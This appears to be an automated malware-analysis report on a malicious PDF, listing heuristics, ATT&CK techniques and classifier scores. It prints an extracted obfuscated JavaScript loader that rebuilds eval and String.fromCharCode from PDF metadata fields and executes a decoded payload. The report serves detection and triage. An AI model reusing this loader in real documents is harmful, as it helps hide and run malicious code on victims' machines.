MALICIOUS
116
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 Command and Scripting Interpreter: PowerShell
T1204.002 Malicious File: User Execution: Malicious File
The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The ML classifier strongly flags this PDF as malicious. The embedded JavaScript, named javascript_obj0001_000.js, is likely responsible for executing malicious code, potentially downloading a second-stage payload. The use of String.fromCharCode in the document body further suggests obfuscation techniques common in malicious PDFs.
Machine Learning
- Nyx PDF Classifier malicious score 0.9999
Heuristics 4
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
/Producer (String.fromCharCode) -
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0001_000.js |
pdf-javascript-stream | PDF /JS object 1 at offset 0xA | 638 bytes |
SHA-256: 49514abf7a4b1a11e5c6fdc1a1d329cf92010b51253c185874e52f48c5df8ad3 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 4 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var date = new Date();
trhp='';
var q2 = date.getFullYear()-2007;
niqz='2011s'.replace(date.getFullYear(),'hi');
gzkk=('.tit2011').replace(date.getFullYear(),'le');
Function('','bld=t'+niqz+gzkk)();
pipcr=('sub2011').replace(date.getFullYear(),'ject');
Function('','otqve=t'+niqz+'.'+pipcr)();
var otqve=otqve.replace(date.getFullYear(),'al');
Function('','qidd=t'+niqz+'.'+otqve)();
dznu='.pro2011cer';
dznu=qidd('dznu.replace(date.getFullYear(),"du")');
Function('','gwgub=t'+niqz+dznu)();
qdjaz=qidd(gwgub);
inwj = qidd(bld);
for (i = 0; i < inwj.length; i++) {
wgi = inwj[i];
trhp += qdjaz(wgi);
}
qidd(trhp);
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.